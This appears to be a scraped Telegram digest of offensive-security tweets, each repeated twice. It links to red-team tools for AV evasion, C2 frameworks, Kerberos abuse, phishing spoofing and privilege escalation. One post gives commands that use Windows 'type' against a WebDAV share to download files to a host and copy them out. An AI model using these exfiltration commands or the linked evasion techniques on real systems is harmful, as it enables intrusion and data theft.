😈 [ lpha3ch0, Steve Campbell ]
Pywerview in the Kali repo is outdated and broken so I created a Dockerfile to simplify installing in an isolated container. Also submitted a pull request to add it to the repo: https://t.co/wt9XbHtcDY
🔗 https://github.com/the-useless-one/pywerview/pull/54
🐥 [ tweet ]
Pywerview in the Kali repo is outdated and broken so I created a Dockerfile to simplify installing in an isolated container. Also submitted a pull request to add it to the repo: https://t.co/wt9XbHtcDY
🔗 https://github.com/the-useless-one/pywerview/pull/54
🐥 [ tweet ]
😈 [ theluemmel, ADCluemmelSec ]
Are you also tired of
"This setting is managed by your administrator or organization"
messages, preventing you from altering settings, although you are admin?
Fear no more, I got you covered - well at least partially:
AV
FW
DeviceGuard
Edge
FF
https://t.co/ZHf1QoMSfo
🔗 https://gist.github.com/LuemmelSec/20e2b6429eccf0bac91ac6f17bc98c87
🐥 [ tweet ]
Are you also tired of
"This setting is managed by your administrator or organization"
messages, preventing you from altering settings, although you are admin?
Fear no more, I got you covered - well at least partially:
AV
FW
DeviceGuard
Edge
FF
https://t.co/ZHf1QoMSfo
🔗 https://gist.github.com/LuemmelSec/20e2b6429eccf0bac91ac6f17bc98c87
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Cneelis, Cn33liz ]
It is #BOFFriday again!
Today's release:
> Klist, a BOF implementation to display Kerberos tickets.
> Psk, display loaded kernel modules and summarise installed security products.
Check out the @OutflankNL C2-Tool-Collection repo: https://t.co/Wq1obZlEtk
🔗 https://github.com/outflanknl/C2-Tool-Collection
🐥 [ tweet ]
It is #BOFFriday again!
Today's release:
> Klist, a BOF implementation to display Kerberos tickets.
> Psk, display loaded kernel modules and summarise installed security products.
Check out the @OutflankNL C2-Tool-Collection repo: https://t.co/Wq1obZlEtk
🔗 https://github.com/outflanknl/C2-Tool-Collection
🐥 [ tweet ]
😈 [ chvancooten, Cas van Cooten ]
I have to say, using #ChatGPT as a Telegram bot works impressively well
(Script: https://t.co/vxDGzGaa9K)
🔗 https://github.com/m1guelpf/chatgpt-telegram
🐥 [ tweet ]
I have to say, using #ChatGPT as a Telegram bot works impressively well
(Script: https://t.co/vxDGzGaa9K)
🔗 https://github.com/m1guelpf/chatgpt-telegram
🐥 [ tweet ]
😈 [ KlezVirus, d3adc0de ]
[BLOG POST] And as promised, this is a brief article the describing the technique used within SilentMoonwalk. Might be a good weekend read!
https://t.co/FUnW2Ca6VP
🔗 https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/
🐥 [ tweet ]
[BLOG POST] And as promised, this is a brief article the describing the technique used within SilentMoonwalk. Might be a good weekend read!
https://t.co/FUnW2Ca6VP
🔗 https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/
🐥 [ tweet ]
😈 [ x86matthew, x86matthew ]
StealthHook - A method for hooking functions without modifying memory protection.
This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception.
https://t.co/vdrNVTdMnd
🔗 https://www.x86matthew.com/view_post?id=stealth_hook
🐥 [ tweet ]
StealthHook - A method for hooking functions without modifying memory protection.
This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception.
https://t.co/vdrNVTdMnd
🔗 https://www.x86matthew.com/view_post?id=stealth_hook
🐥 [ tweet ]
😈 [ ippsec, ippsec ]
#HackTheBox Outdated video is up! The box features Folina, Shadow Credentials, and some lateral movement by injecting a malicious windows update with SharpWSUS.
https://t.co/od5IlQk33s
🔗 https://youtu.be/TR132R1h3Ds
🐥 [ tweet ]
#HackTheBox Outdated video is up! The box features Folina, Shadow Credentials, and some lateral movement by injecting a malicious windows update with SharpWSUS.
https://t.co/od5IlQk33s
🔗 https://youtu.be/TR132R1h3Ds
🐥 [ tweet ]
🔥4
😈 [ Mr_0rng, mr.0range ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
😈 [ netbiosX, netbiosX 🦄 ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
😈 [ m2rc_p, marc ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
🔥1
Forwarded from Внутрянка
Статья про shadow credentials
Ardent101
Kerberos для специалиста по тестированию на проникновение. Часть 6. PKINIT
В статье рассматривается устройство одного из расширений протокола Kerberos - PKINIT. После теоретической вводной будут разобраны техники проведения атак, связанные с указанным расширением, в частности: Shadow Credentials и UnPAC the hash.
Если вкратце, то…
Если вкратце, то…
🔥5
😈 [ c2_matrix, C2 Matrix | #C2Matrix ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
🔥1
😈 [ r3dy__, Royce Davis ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
это лаба для инфры отсюда, ес че https://livebook.manning.com/book/penetrating-enterprise-networks (неплохой generic-материал по внутрякам)😈 [ Flangvik, Melvin langvik ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ chompie1337, chompie ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
🔥4
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
😈 [ 424f424f, rvrsh3ll ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
😈 [ 404death, sailay(valen) ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]